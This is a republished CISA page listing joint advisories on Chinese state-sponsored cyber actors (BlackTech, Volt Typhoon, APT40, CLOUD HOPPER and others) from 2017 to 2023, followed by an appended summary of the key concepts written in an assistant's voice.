China Cyber Threat Overview and Advisories

September 27, 2023Joint Cybersecurity Advisory:People's Republic of China-Linked Cyber Actors Hide in Router FirmwareU.S. National Security Agency (NSA), Federal Bureau of Investigation (FBI), and Cybersecurity and Infrastructure Security Agency (CISA), along with the Japan National Police Agency (NPA) and the Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC) released joint Cybersecurity Advisory (CSA). The CSA details activity by cyber actors, known as BlackTech, linked to the People’s Republic of China (PRC). The advisory provides BlackTech tactics, techniques, and procedures (TTPs) and urges multinational corporations to review all subsidiary connections, verify access, and consider implementing zero trust models to limit the extent of a potential BlackTech compromise.May 24, 2023

Joint Cybersecurity Advisory:People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection

This Advisory focuses on a tactic called Living off the land, or LOTL, a set of techniques used by cyber actors to maintain anonymity within IT infrastructures by abusing tools already present in the environment.

For more information, see:

CISA:U.S. and International Partners Release Advisory Warning of PRC State-Sponsored Cyber Activity
Microsoft:Volt Typhoon targets US critical infrastructure with living-off-the-land techniques
Palo Alto Networks: Threat Brief: Attacks on Critical Infrastructure Attributed to Volt Typhoon
Secureworks: Chinese Cyberespionage Group BRONZE SILHOUETTE Targets U.S. Government and Defense Organizations
Splunk: Volt Typhoon
Zyxel: Guidance for the recent attacks on the ZyWALL devices

October 6, 2022

Joint Cybersecurity Advisory:Top CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors

CISA, NSA, and FBI released an advisory toprovidethe top Common Vulnerabilities and Exposures (CVEs) used since 2020 by People’s Republic of China (PRC).June 7, 2022

Joint Cybersecurity Advisory:People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices

CISA, NSA, and FBI released an advisorydescribingthe ways in which PRCstate-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure.August 20, 2021

Joint Cybersecurity Advisory: Chinese Observed TTPs

CISA, NSA, and FBI released an advisory describing Chinese cyber threat behavior and trends and provides mitigations to help protect the Federal Government; state, local, tribal, and territorial governments; critical infrastructure, defense industrial base, and private industry organizations.July 21, 2021

Joint Cybersecurity Advisory: Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013

CISA and FBI released an advisory providing information on a spearphishing and intrusion campaign conducted by state-sponsored Chinese actors that occurred from December 2011 to 2013, targeting U.S. oil and natural gas (ONG) pipeline companies.July 20, 2021

Joint Cybersecurity Advisory: TTPs of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department

CISA and FBI released an advisory to help network defenders identify and remediate APT40 intrusions and established footholds. See the July 19, 2021,Department of Justice press release.July 19, 2021

JointCISA Insights: Chinese Cyber Threat Overview for Leaders

CISA, NSA, and FBI released a joint CISA Insights to help leaders understand this threat and how to reduce their organization's risk of falling victim to cyber espionage and data theft.March 03, 2021

CISA Alert: Mitigate Microsoft Exchange Server Vulnerabilities

CISA partners observed active exploitation of vulnerabilities in Microsoft Exchange Server products. This Alert includes tactics, techniques, and procedures and indicators of compromise associated with this activity. See the July 19, 2021White House Statement.October 1, 2020

CISA Alert: Potential for China Cyber Response to Heightened U.S.-China Tensions

In light of heightened tensions between the United States and China, CISA released an Alert providing specific Chinese government and affiliated cyber threat actor tactics, techniques, and procedures (TTPs). The Alert also includes recommended mitigations to the cybersecurity community to assist in the protection of our Nation’s critical infrastructure.September 14, 2020

Joint Cybersecurity Advisory: Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity

CISA has consistently observed Chinese Ministry of State (MSS)-affiliated cyber threat actors using publicly available information sources and common, well-known TTPs to target U.S. government agencies. This advisory identifies some of the more common TTPs employed by cyber threat actors, including those affiliated with the Chinese MSS.August 3, 2020

MAR-10292089-1.v2 – Chinese Remote Access Trojan: TAIDOOR

CISA, FBI, and DoD released a MAR describing Chinese government actors using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation.May 13, 2020

CISA and FBI Joint Public Service Announcement: People’s Republic of China (PRC) Targeting of COVID-19 Research Organizations

CISA and FBI issued a Public Service Announcement warning healthcare, pharmaceutical, and research sectors working on the COVID-19 response of likely targeting and attempted network compromise by the PRC.February 2019

CISA Webinar: Chinese Cyber Activity Targeting Managed Service Providers

CISA Webinar Slide Deck: Chinese Cyber Activity Targeting Managed Service Providers

CISA provided a Webinar on Chinese state-sponsored cyber actors targeting managed service providers (MSPs) and their customers. This campaign is referred to as CLOUD HOPPER.

October 3, 2018

CISA Alert: Advanced Persistent Threat Activity Exploiting Managed Service Providers

CISA Alert: Using Rigorous Credential Control to Mitigate Trusted Network Exploitation

These Alerts address the CLOUD HOPPER Campaign. Since May 2016, APT actors have used various TTPs to attempt to infiltrate the networks of global MSPs for the purposes of cyber espionage and intellectual property theft. APT actors have targeted victims in several U.S. critical infrastructure sectors, including IT, Energy, Healthcare and Public Health, Communications, and Critical Manufacturing.April 27, 2017

CISA Alert: Intrusions Affecting Multiple Victims Across Multiple Sectors

This Alert provides information on a campaign in which Chinese government cyber threat actors exploited trust relationships between IT service providers—such as MSPs and cloud service providers—and their customers. Chinese cyber actors associated with the Chinese MSS carried out a campaign of cyber-enabled theft targeting global technology service providers and their customers. The actors gained access to multiple U.S. and global IT service providers and their customers in an effort to steal the intellectual property and sensitive data of companies located in at least 12 countries.

Certainly, the information provided showcases a series of joint cybersecurity advisories and alerts primarily focused on the activities and tactics of Chinese state-sponsored cyber actors. These advisories are released collaboratively by various agencies like CISA, NSA, FBI, and cybersecurity organizations to inform and caution about specific threats, tactics, techniques, and procedures (TTPs) used by these actors. Here's a breakdown of the key concepts mentioned:

BlackTech: A group of cyber actors associated with the People’s Republic of China (PRC). Advisories detail their tactics, urging corporations to review connections and consider implementing zero trust models to limit potential compromises.
Living off the Land (LOTL): A tactic used by cyber actors to maintain anonymity within IT infrastructures by exploiting tools already present in the environment. It's mentioned in an advisory warning about PRC state-sponsored cyber activity.
Common Vulnerabilities and Exposures (CVEs): Specific vulnerabilities actively exploited by PRC state-sponsored cyber actors. Several advisories mention top CVEs used by these actors since 2020.
Exploitation of Network Providers and Devices: Chinese cyber actors' exploitation of publicly known vulnerabilities to compromise infrastructure, establish networks, and conduct cyber espionage.
Observed Tactics, Techniques, and Procedures (TTPs): Advisories describe Chinese cyber threat behavior, trends, and provide mitigations to protect government, critical infrastructure, defense organizations, and private industry.
Specific Campaigns: Various campaigns and intrusions are highlighted, such as the Gas Pipeline Intrusion Campaign targeting US oil and natural gas pipeline companies and the APT40 intrusions associated with China’s MSS Hainan State Security Department.
Malware and Trojans: Descriptions of specific malware variants like TAIDOOR used by Chinese government actors to maintain a presence and exploit victim networks.
Targeted Sectors and Entities: The advisories warn about specific sectors targeted by Chinese cyber actors, including managed service providers (MSPs), critical infrastructure (IT, Energy, Healthcare, Communications, Critical Manufacturing), and companies engaged in COVID-19 research.
CLOUD HOPPER Campaign: A campaign targeting MSPs and their customers, involving cyber espionage and intellectual property theft by Chinese state-sponsored actors.

These advisories collectively provide detailed insights into the tactics, strategies, and targets of Chinese state-sponsored cyber actors over a span of years, aiming to equip organizations with the knowledge to bolster their cybersecurity defenses against these threats.

China Cyber Threat Overview and Advisories | CISA (2024)